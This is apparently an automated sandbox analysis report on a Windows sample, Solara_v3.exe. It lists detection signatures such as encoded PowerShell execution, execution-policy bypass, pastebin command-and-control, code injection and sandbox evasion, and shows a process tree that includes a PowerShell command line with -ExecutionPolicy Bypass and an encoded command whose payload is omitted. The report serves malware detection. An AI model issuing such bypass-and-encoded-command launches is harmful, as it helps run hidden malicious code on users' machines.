Windows
Analysis Report
Solara_v3.exe
Overview
General Information
Detection
| Field | Value |
| --- | --- |
| Score | 76 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- Solara_v3.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\Solara_v3.exe" MD5: 404F9A9A90F2729D0ACBA7E76527FB88)
- conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 652 cmdline: "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted])